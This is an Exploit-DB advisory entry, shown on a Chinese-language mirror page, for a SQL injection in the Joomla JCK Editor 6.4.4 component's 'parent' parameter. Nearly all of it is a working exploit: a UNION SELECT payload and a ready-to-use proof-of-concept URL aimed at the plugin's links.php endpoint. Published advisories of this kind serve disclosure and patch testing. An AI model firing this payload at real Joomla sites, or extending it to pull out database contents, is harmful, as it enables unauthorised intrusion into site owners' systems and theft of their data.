Joomla! Component JCK Editor 6.4.4 – ‘parent’ SQL Injection

  • 作者: Hamza Megahed
    日期: 2018-09-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/45423/
  • # Title: Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection
    # Date: 2018-09-14
    # Exploit Author: Hamza Megahed
    # Vendor Homepage:https://www.joomla.org/
    # Download: https://arkextensions.com/products/jck-editor
    # Version: 6.4.4
    # Tested on: Ubuntu, FireFox,
    # CVE: N/A
    
    # Parameter = parent
    # Payload = " UNION SELECT NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL -- aa
    # Poc:
    
    Test = [HOST]/[PATH]/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa